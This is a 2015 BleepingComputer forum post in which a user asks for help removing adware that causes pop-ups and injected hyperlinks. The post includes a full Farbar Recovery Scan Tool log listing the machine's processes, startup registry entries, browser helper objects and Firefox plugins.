Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help! "Ad by name" or "Miss Sunshine" creating pop ups, and hyperlinks


  • This topic is locked This topic is locked
41 replies to this topic

#1 ah_hin

ah_hin

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 07 April 2015 - 12:47 AM

I was taking a quiz on canvas.instructure.com, and the browser suddenly closes on its own, and when I reopen it, many words on the page have turn into clickable hyperlinks. Also, whenever I click an empty area on the website, windows pop ups, and my links are redirected to ads, other websites, etc...
Please help me removing this problem/malware!

Thanks!


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 11-03-2015
Ran by User (administrator) on GIGABYTE on 06-04-2015 22:18:56
Running from C:\Users\User\Desktop\Malware software
Loaded Profiles: User & (Available profiles: User)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Juniper Networks, Inc.) C:\Program Files (x86)\Common Files\Juniper Networks\JUNS\dsAccessService.exe
(Microsoft Corporation) C:\Windows\System32\InputMethod\CHT\ChtIME.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\GIGABYTE\SmartManagerV3\ElevateService.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.26.9\GoogleCrashHandler.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.26.9\GoogleCrashHandler64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
() C:\Windows\System32\PnkBstrA.exe
(Mentor Graphics Corporation) C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(Mentor Graphics Corporation) C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\dispatcher.exe
(GIGABYTE) C:\Program Files\GIGABYTE\Smart Update\Update_Service.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(GIGABYTE) C:\Program Files\GIGABYTE\Smart Update\GMSG.exe
(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Codessentials) C:\Program Files (x86)\Codessentials\Yadis\Yadis.exe
(Bluebeam Software, Inc.) C:\Program Files\Common Files\Bluebeam Software\Bluebeam Revu\Brewery\V45\Printer Support\BBPrint.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_IATIJAE.EXE
(GIGABYTE TECHNOLOGY CO., LTD.) C:\Program Files\GIGABYTE\SmartManagerV3\OSD\GBOSDV2.exe
(Dropbox, Inc.) C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(GIGABYTE TECHNOLOGY CO., LTD.) C:\Program Files\GIGABYTE\SmartManagerV3\GBSMV2.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\Innovative Solutions\Advanced Uninstaller PRO\checker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286704 2013-03-22] (Intel Corporation)
HKLM\...\Run: [ProfilerU] => C:\Program Files\SmartTechnology\Software\ProfilerU.exe [454144 2013-04-16] (Saitek)
HKLM\...\Run: [SaiMfd] => C:\Program Files\SmartTechnology\Software\SaiMfd.exe [158208 2013-04-16] (Saitek)
HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2673296 2015-03-27] (NVIDIA Corporation)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [8292120 2013-11-14] (Logitech Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-10-24] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1368792 2013-11-13] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-19] (Adobe Systems Incorporated)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [161984 2014-04-05] (IvoSoft)
HKLM\...\Run: [Yadis] => c:\program files (x86)\codessentials\yadis\yadis.exe [1777664 2014-04-15] (Codessentials)
HKLM\...\Run: [BbInstallUser] => C:\Program Files\Bluebeam Software\Bluebeam Revu\Pushbutton PDF\Bluebeam Admin User.exe [48696 2014-02-21] (Bluebeam Software, Inc.)
HKLM\...\Run: [BbPrintMonitor] => C:\Program Files\Common Files\Bluebeam Software\Bluebeam Revu\Brewery\V45\Printer Support\BBPrint.exe [211000 2014-02-21] (Bluebeam Software, Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3100440 2014-05-19] (Logitech, Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [93296 2012-07-13] (CyberLink Corp.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [926896 2012-09-23] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3477640 2012-09-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585048 2014-04-17] (Razer Inc.)
HKLM-x32\...\Run: [JunosPulse] => C:\Program Files (x86)\Common Files\Juniper Networks\JamUI\Pulse.exe [2521944 2014-08-07] (Juniper Networks, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058400 2012-01-26] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [642664 2013-12-24] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [863848 2013-12-24] (SEIKO EPSON CORPORATION)
HKLM-x32\...\RunOnce: [SmartUpdate] => C:\Program Files\GIGABYTE\Smart Update\urgent.exe [362496 2015-02-11] (GIGABYTE)
HKLM\...\Winlogon: [Shell] explorer.exe,explorer.exe
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [11776 2013-08-22] (Microsoft Corporation)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [11776 2013-08-22] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [178512 2015-03-13] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [178512 2015-03-13] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [164568 2015-03-13] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GBOSDV3.lnk
ShortcutTarget: GBOSDV3.lnk -> C:\Program Files\GIGABYTE\SmartManagerV3\OSD\GBOSDV2.exe (GIGABYTE TECHNOLOGY CO., LTD.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SolidWorks 2014 Fast Start.lnk
ShortcutTarget: SolidWorks 2014 Fast Start.lnk -> C:\Windows\Installer\{4FFA60C4-9A8B-4C9E-8265-2241B266304C}\NewShortcut2_87EDF6C81D0A4B7B84F42FE0C6A9D608.exe (Flexera Software LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SolidWorks Background Downloader.lnk
ShortcutTarget: SolidWorks Background Downloader.lnk -> C:\Program Files (x86)\Common Files\SolidWorks Installation Manager\BackgroundDownloading\sldBgDwld.exe (Dassault Systèmes SolidWorks Corp.)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = http://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com/?pc=SBJB
SearchScopes: HKU\.DEFAULT -> DefaultScope {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
SearchScopes: HKU\.DEFAULT -> {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
SearchScopes: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002 -> {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
SearchScopes: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
BHO: Super Radio -> {11111111-1111-1111-1111-110611791177} -> No File
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-04-05] (IvoSoft)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2014-04-05] (IvoSoft)
BHO: DVDVideoSoft IE Extension -> {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} -> C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns64.dll [2014-05-27] (DVDVideoSoft Ltd.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-04-05] (IvoSoft)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-09-26] (Oracle Corporation)
BHO-x32: Adobe Acrobat Create PDF Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-09-26] (Oracle Corporation)
BHO-x32: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2014-04-05] (IvoSoft)
BHO-x32: DVDVideoSoft IE Extension -> {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} -> C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns.dll [2014-08-07] (DVDVideoSoft Ltd.)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-04-05] (IvoSoft)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-04-05] (IvoSoft)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} https://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76

FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default
FF SelectedSearchEngine: Webster
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll [2014-09-01] (EA Digital Illusions CE AB)
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll [2014-12-11] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-19] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @baidu.com/npxbdsetup -> C:\WINDOWS\Downloaded Program Files\12151625\npxbdsetup.dll [2012-12-26] ()
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-05-31] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-05-31] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-09-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-09-26] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll [2014-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-03-13] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-03-13] (NVIDIA Corporation)
FF Plugin-x32: @qvod.com/QvodInsert -> D:\Program Files (x86)\xuanfeng\QvodPlayer\npQvodInsert.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll No File
